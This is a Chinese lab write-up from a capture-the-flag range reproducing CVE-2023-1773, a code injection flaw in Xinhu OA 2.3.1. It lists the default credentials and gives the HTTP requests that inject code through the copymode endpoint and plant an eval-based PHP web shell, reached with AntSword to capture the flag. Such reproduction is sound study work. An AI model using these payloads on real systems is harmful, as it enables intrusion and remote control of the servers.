CVE-2023-1773 - 信呼2.3.1 GETSHELL 春秋云境 漏洞复现

信呼OA是一款免费开源的办公OA系统,包括APP,pc上客户端,REIM即时通信,服务端等。信呼OA在2.3.3版本之前存在代码注入漏洞。该漏洞影响到组件配置文件处理程序的webmainConfig.php文件的代码。篡改导致代码注入。

信呼2.3.1漏洞使用google搜索

https://blog.csdn.net/C20220511/article/details/136472171

信呼安装之后默认存在账号diaochan/xiaoqiao/daqiao/rock/zhangfei/zhaozl等用户,密码都是123456
我们随机使用一个用户尝试进行登录
我这里使用了
账号:xiaoqiang
密码:123456

构造请求:

GET:http://eci-2ze4vfti2ihpmfgxvg5y.cloudeci1.ichunqiu.com/index.php?d=main&m=flow&a=copymode&ajaxbool=true
POST:id=1&name=a{};phpinfo ();class a


出现ok说明成功写入class a了。
生成的文件进行访问

http://eci-2ze4vfti2ihpmfgxvg5y.cloudeci1.ichunqiu.com/webmain/model/flow/2%7B%7D%3Bphpinfo%20%28%29%3Bclass%20aModel.php
or
http://eci-2ze4vfti2ihpmfgxvg5y.cloudeci1.ichunqiu.com/webmain/flow/input/mode_a%7B%7D%3Bphpinfo%20%28%29%3Bclass%20aAction.php

可以看到是成功进行访问的

我们接下来进行GETSHELL

GET:http://eci-2ze4vfti2ihpmfgxvg5y.cloudeci1.ichunqiu.com/index.php?d=main&m=flow&a=copymode&ajaxbool=true
POST:id=1&name=a{};eval (strtoupper("eval (\$_request[1]);"));class a

进行GETSHELL:

http://eci-2ze4vfti2ihpmfgxvg5y.cloudeci1.ichunqiu.com/webmain/flow/input/mode_a%7b%7d;eval%20(strtoupper(%22eval%20(%5c$_request%5b1%5d);%22));class%20aAction.php;
链接密码:1

直接进行蚁剑连接

成功拿到flag

flag{86c57da6-91a6-4ec9-b20d-10964a296acb}

posted @ 2025-03-09 09:57  萧瑟迪亲传大弟子  阅读(558)  评论(0)    收藏  举报